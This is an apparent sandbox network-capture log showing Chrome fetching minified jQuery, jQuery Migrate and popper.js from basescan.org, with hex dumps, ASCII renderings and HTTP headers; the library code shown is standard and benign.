                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 66 6c 61 74 2e 63 61 6c 6c 28 65 29 20 7d 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 20 65 29 20 7d 2c 20 75 20 3d 20 74 2e 70 75 73 68 2c 20 69 20 3d 20 74 2e 69 6e 64 65 78 4f 66 2c 20 6e 20 3d 20 7b 7d 2c 20 6f 20 3d 20 6e 2e 74 6f 53 74 72 69 6e 67 2c 20 76 20 3d 20 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 20 61 20 3d 20 76 2e 74 6f 53 74 72 69 6e 67 2c 20 6c 20 3d 20 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 20 79 20 3d 20 7b 7d 2c 20 6d 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 72 65 74 75 72 6e 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 65 20 26 26 20 22 6e 75 6d 62 65 72 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 6e
                                                                                                                                                                                                                                              Data Ascii: flat.call(e) } : function (e) { return t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function (e) { return "function" == typeof e && "number" != typeof e.n
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 7d 2c 20 6d 61 70 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6e 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 20 74 2c 20 65 29 20 7d 29 29 20 7d 2c 20 73 6c 69 63 65 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 29 29 20 7d 2c 20 66 69 72 73 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 20 7d 2c 20 6c 61 73 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d
                                                                                                                                                                                                                                              Data Ascii: }, map: function (n) { return this.pushStack(S.map(this, function (e, t) { return n.call(e, t, e) })) }, slice: function () { return this.pushStack(s.apply(this, arguments)) }, first: function () { return this.eq(0) }, last: function () { return this.eq(-
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 65 29 20 7d 2c 20 6e 6f 6f 70 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 7d 2c 20 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 2c 20 6e 3b 20 72 65 74 75 72 6e 20 21 28 21 65 20 7c 7c 20 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 20 21 3d 3d 20 6f 2e 63 61 6c 6c 28 65 29 29 20 26 26 20 28 21 28 74 20 3d 20 72 28 65 29 29 20 7c 7c 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 28 6e 20 3d 20 76 2e 63 61 6c 6c 28 74 2c 20 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 20 26 26 20 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 20 26 26 20 61 2e 63 61 6c 6c 28 6e 29 20 3d 3d 3d 20 6c 29 20 7d 2c 20 69 73 45 6d 70 74 79 4f 62 6a 65 63 74
                                                                                                                                                                                                                                              Data Ascii: row new Error(e) }, noop: function () { }, isPlainObject: function (e) { var t, n; return !(!e || "[object Object]" !== o.call(e)) && (!(t = r(e)) || "function" == typeof (n = v.call(t, "constructor") && t.constructor) && a.call(n) === l) }, isEmptyObject
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 74 20 2b 20 22 5d 22 5d 20 3d 20 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7d 29 3b 20 76 61 72 20 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 6e 29 20 7b 20 76 61 72 20 65 2c 20 64 2c 20 62 2c 20 6f 2c 20 69 2c 20 68 2c 20 66 2c 20 67 2c 20 77 2c 20 75 2c 20 6c 2c 20 54 2c 20 43 2c 20 61 2c 20 45 2c 20 76 2c 20 73 2c 20 63 2c 20 79 2c 20 53 20 3d 20 22 73 69 7a 7a 6c 65 22 20 2b 20 31 20 2a 20 6e 65 77 20 44 61 74
                                                                                                                                                                                                                                              Data Ascii: oolean Number String Function Array Date RegExp Object Error Symbol".split(" "), function (e, t) { n["[object " + t + "]"] = t.toLowerCase() }); var d = function (n) { var e, d, b, o, i, h, f, g, w, u, l, T, C, a, E, v, s, c, y, S = "sizzle" + 1 * new Dat
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 45 78 70 28 22 5e 23 28 22 20 2b 20 49 20 2b 20 22 29 22 29 2c 20 43 4c 41 53 53 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 20 2b 20 49 20 2b 20 22 29 22 29 2c 20 54 41 47 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 20 2b 20 49 20 2b 20 22 7c 5b 2a 5d 29 22 29 2c 20 41 54 54 52 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 20 2b 20 57 29 2c 20 50 53 45 55 44 4f 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 20 2b 20 46 29 2c 20 43 48 49 4c 44 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 20 2b 20 4d 20 2b 20 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28
                                                                                                                                                                                                                                              Data Ascii: Exp("^#(" + I + ")"), CLASS: new RegExp("^\\.(" + I + ")"), TAG: new RegExp("^(" + I + "|[*])"), ATTR: new RegExp("^" + W), PSEUDO: new RegExp("^" + F), CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + M + "*(even|odd|(([+-]|)(
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 20 28 65 29 20 7b 20 48 20 3d 20 7b 20 61 70 70 6c 79 3a 20 74 2e 6c 65 6e 67 74 68 20 3f 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 4c 2e 61 70 70 6c 79 28 65 2c 20 4f 2e 63 61 6c 6c 28 74 29 29 20 7d 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 76 61 72 20 6e 20 3d 20 65 2e 6c 65 6e 67 74 68 2c 20 72 20 3d 20 30 3b 20 77 68 69 6c 65 20 28 65 5b 6e 2b 2b 5d 20 3d 20 74 5b 72 2b 2b 5d 29 3b 20 65 2e 6c 65 6e 67 74 68 20 3d 20 6e 20 2d 20 31 20 7d 20 7d 20 7d 20 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 2c 20 65 2c 20 6e 2c 20 72 29 20 7b 20 76 61 72 20 69 2c 20 6f 2c 20 61 2c 20 73 2c 20 75 2c 20 6c 2c 20 63 2c 20 66 20 3d 20 65 20 26 26 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 20 70 20 3d 20 65 20 3f 20 65 2e 6e 6f
                                                                                                                                                                                                                                              Data Ascii: (e) { H = { apply: t.length ? function (e, t) { L.apply(e, O.call(t)) } : function (e, t) { var n = e.length, r = 0; while (e[n++] = t[r++]); e.length = n - 1 } } } function se(t, e, n, r) { var i, o, a, s, u, l, c, f = e && e.ownerDocument, p = e ? e.no
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 2c 20 22 24 31 22 29 2c 20 65 2c 20 6e 2c 20 72 29 20 7d 20 66 75 6e 63 74 69 6f 6e 20 75 65 28 29 20 7b 20 76 61 72 20 72 20 3d 20 5b 5d 3b 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 20 6e 29 20 7b 20 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 20 2b 20 22 20 22 29 20 3e 20 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 20 26 26 20 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 20 65 5b 74 20 2b 20 22 20 22 5d 20 3d 20 6e 20 7d 20 7d 20 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 20 7b 20 72 65 74 75 72 6e 20 65 5b 53 5d 20 3d 20 21 30 2c 20 65 20 7d 20 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 20 74 72 79 20 7b 20
                                                                                                                                                                                                                                              Data Ascii: , "$1"), e, n, r) } function ue() { var r = []; return function e(t, n) { return r.push(t + " ") > b.cacheLength && delete e[r.shift()], e[t + " "] = n } } function le(e) { return e[S] = !0, e } function ce(e) { var t = C.createElement("fieldset"); try {
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 3d 20 65 5b 6e 5d 29 29 20 7d 29 20 7d 29 20 7d 20 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 20 7b 20 72 65 74 75 72 6e 20 65 20 26 26 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 20 26 26 20 65 20 7d 20 66 6f 72 20 28 65 20 69 6e 20 64 20 3d 20 73 65 2e 73 75 70 70 6f 72 74 20 3d 20 7b 7d 2c 20 69 20 3d 20 73 65 2e 69 73 58 4d 4c 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 65 20 26 26 20 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 20 6e 20 3d 20 65 20 26 26 20 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 20 72 65 74 75 72 6e 20 21 59 2e 74 65 73 74 28 74 20 7c
                                                                                                                                                                                                                                              Data Ascii: = e[n])) }) }) } function ye(e) { return e && "undefined" != typeof e.getElementsByTagName && e } for (e in d = se.support = {}, i = se.isXML = function (e) { var t = e && e.namespaceURI, n = e && (e.ownerDocument || e).documentElement; return !Y.test(t |
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 7b 20 69 66 20 28 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 20 26 26 20 45 29 20 7b 20 76 61 72 20 6e 20 3d 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 20 72 65 74 75 72 6e 20 6e 20 3f 20 5b 6e 5d 20 3a 20 5b 5d 20 7d 20 7d 29 20 3a 20 28 62 2e 66 69 6c 74 65 72 2e 49 44 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 6e 20 3d 20 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 20 6e 65 29 3b 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 20 26 26 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e
                                                                                                                                                                                                                                              Data Ascii: { if ("undefined" != typeof t.getElementById && E) { var n = t.getElementById(e); return n ? [n] : [] } }) : (b.filter.ID = function (e) { var n = e.replace(te, ne); return function (e) { var t = "undefined" != typeof e.getAttributeNode && e.getAttributeN


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              80192.168.2.549819104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC629OUTGET /assets/vendor/jquery-migrate/dist/jquery-migrate.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 13 Feb 2019 03:18:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0a49b94ac3d41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58861
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V8SSICsoQnJSBtAKyCU4UVuE8c6g7cIgHN5FXMFlmxWZWRxYsuSXuUOMNc2PSNqsY0sMBq%2B2jOa%2BRktr8k7IyKUU6N9bHsw7u0nEsYGNRwe8EMYm14nZh8pOBUQJQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d7f9847cfc-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC557INData Raw: 32 30 35 61 0d 0a 76 6f 69 64 20 30 3d 3d 3d 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 77 69 6e 64 6f 77 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 77 69 6e 64 6f 77 29 3a 65 28 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73
                                                                                                                                                                                                                                              Data Ascii: 205avoid 0===jQuery.migrateMute&&(jQuery.migrateMute=!0),function(e){"function"==typeof define&&define.amd?define(["jquery"],window,e):"object"==typeof module&&module.exports?module.exports=e(require("jquery"),window):e(jQuery,window)}(function(e,t){"us
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 2c 6e 2c 61 29 7b 65 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 61 29 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 65 2e 6d 69 67 72 61 74 65 56 65 72 73 69 6f 6e 3d 22 33 2e 30 2e 31 22 2c 74 2e 63 6f 6e 73 6f 6c 65 26 26 74 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 26 26 28 65 26 26 21 2f 5e 5b 31 32 5d 5c 2e 2f 2e 74 65 73 74 28 65 2e 66 6e 2e 6a 71 75 65 72 79 29 7c 7c 74 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 6a 51 75 65 72 79 20 33 2e 30 2e 30 2b 20 52 45 51 55 49 52 45 44 22 29 2c 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 26 26 74 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45
                                                                                                                                                                                                                                              Data Ascii: })}function a(e,t,n,a){e[t]=function(){return r(a),n.apply(this,arguments)}}e.migrateVersion="3.0.1",t.console&&t.console.log&&(e&&!/^[12]\./.test(e.fn.jquery)||t.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),e.migrateWarnings&&t.console.log("JQMIGRATE
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 3b 20 75 73 65 20 74 68 65 20 2e 6c 65 6e 67 74 68 20 70 72 6f 70 65 72 74 79 22 29 2c 74 68 69 73 2e 6c 65 6e 67 74 68 7d 2c 65 2e 70 61 72 73 65 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 6a 51 75 65 72 79 2e 70 61 72 73 65 4a 53 4f 4e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 4a 53 4f 4e 2e 70 61 72 73 65 22 29 2c 4a 53 4f 4e 2e 70 61 72 73 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 65 2e 69 73 4e 75 6d 65 72 69 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 2c 61 2c 6f 3d 75 28 74 29 2c 69 3d 28 61 3d 28 6e 3d 74 29 26 26 6e 2e 74 6f 53 74 72 69 6e 67 28 29 2c 21 65 2e 69 73 41 72 72 61 79
                                                                                                                                                                                                                                              Data Ascii: deprecated and removed; use the .length property"),this.length},e.parseJSON=function(){return r("jQuery.parseJSON is deprecated; use JSON.parse"),JSON.parse.apply(null,arguments)},e.isNumeric=function(t){var n,a,o=u(t),i=(a=(n=t)&&n.toString(),!e.isArray
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 65 64 22 29 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 29 7c 7c 22 22 3b 72 26 26 65 2e 64 61 74 61 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 2c 72 29 2c 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 26 26 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 2c 72 7c 7c 21 31 3d 3d 3d 74 3f 22 22 3a 65 2e 64 61 74 61 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 29 7c 7c 22 22 29 7d 29 29 7d 3b 76 61 72 20 68 3d 21 31 3b 65 2e 73 77 61 70 26 26 65 2e 65 61 63 68 28 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 2c 22
                                                                                                                                                                                                                                              Data Ascii: ed"),this.each(function(){var r=this.getAttribute&&this.getAttribute("class")||"";r&&e.data(this,"__className__",r),this.setAttribute&&this.setAttribute("class",r||!1===t?"":e.data(this,"__className__")||"")}))};var h=!1;e.swap&&e.each(["height","width","
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 26 26 6e 28 65 2e 66 78 2c 22 69 6e 74 65 72 76 61 6c 22 2c 65 2e 66 78 2e 69 6e 74 65 72 76 61 6c 2c 22 6a 51 75 65 72 79 2e 66 78 2e 69 6e 74 65 72 76 61 6c 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 29 3b 76 61 72 20 51 3d 65 2e 66 6e 2e 6c 6f 61 64 2c 62 3d 65 2e 65 76 65 6e 74 2e 61 64 64 2c 77 3d 65 2e 65 76 65 6e 74 2e 66 69 78 3b 65 2e 65 76 65 6e 74 2e 70 72 6f 70 73 3d 5b 5d 2c 65 2e 65 76 65 6e 74 2e 66 69 78 48 6f 6f 6b 73 3d 7b 7d 2c 6e 28 65 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2c 22 63 6f 6e 63 61 74 22 2c 65 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2e 63 6f 6e 63 61 74 2c 22 6a 51 75 65 72 79 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2e 63 6f 6e 63 61 74 28 29 20 69 73 20 64 65 70 72 65 63 61 74 65
                                                                                                                                                                                                                                              Data Ascii: estAnimationFrame&&n(e.fx,"interval",e.fx.interval,"jQuery.fx.interval is deprecated");var Q=e.fn.load,b=e.event.add,w=e.event.fix;e.event.props=[],e.event.fixHooks={},n(e.event.props,"concat",e.event.props.concat,"jQuery.event.props.concat() is deprecate
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6e 29 7b 65 2e 66 6e 5b 6e 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 28 22 6a 51 75 65 72 79 2e 66 6e 2e 22 2b 6e 2b 22 28 29 20 65 76 65 6e 74 20 73 68 6f 72 74 68 61 6e 64 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 29 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 3f 74 68 69 73 2e 6f 6e 28 6e 2c 6e 75 6c 6c 2c 65 2c 74 29 3a 74 68 69 73 2e 74 72 69 67 67 65 72 28 6e 29 7d 7d 29 2c 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 2e 64 6f 63 75 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 22 72 65 61 64 79 22 29 7d 29 2c 65 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 72 65 61 64 79 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 3d 3d 3d 74 2e 64 6f 63 75 6d 65 6e 74 26 26
                                                                                                                                                                                                                                              Data Ascii: n){e.fn[n]=function(e,t){return r("jQuery.fn."+n+"() event shorthand is deprecated"),arguments.length>0?this.on(n,null,e,t):this.trigger(n)}}),e(function(){e(t.document).triggerHandler("ready")}),e.event.special.ready={setup:function(){this===t.document&&
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC888INData Raw: 64 53 65 6c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 6a 51 75 65 72 79 2e 66 6e 2e 61 6e 64 53 65 6c 66 28 29 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 2c 20 75 73 65 20 6a 51 75 65 72 79 2e 66 6e 2e 61 64 64 42 61 63 6b 28 29 22 29 2c 53 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 76 61 72 20 41 3d 65 2e 44 65 66 65 72 72 65 64 2c 71 3d 5b 5b 22 72 65 73 6f 6c 76 65 22 2c 22 64 6f 6e 65 22 2c 65 2e 43 61 6c 6c 62 61 63 6b 73 28 22 6f 6e 63 65 20 6d 65 6d 6f 72 79 22 29 2c 65 2e 43 61 6c 6c 62 61 63 6b 73 28 22 6f 6e 63 65 20 6d 65 6d 6f 72 79 22 29 2c 22 72 65 73 6f 6c 76 65 64 22 5d 2c 5b 22 72 65 6a 65 63 74 22 2c 22 66 61 69 6c 22 2c 65 2e 43 61 6c 6c 62 61 63
                                                                                                                                                                                                                                              Data Ascii: dSelf=function(){return r("jQuery.fn.andSelf() is deprecated and removed, use jQuery.fn.addBack()"),S.apply(this,arguments)};var A=e.Deferred,q=[["resolve","done",e.Callbacks("once memory"),e.Callbacks("once memory"),"resolved"],["reject","fail",e.Callbac
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              81192.168.2.549821104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC620OUTGET /assets/vendor/popper.js/dist/umd/popper.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
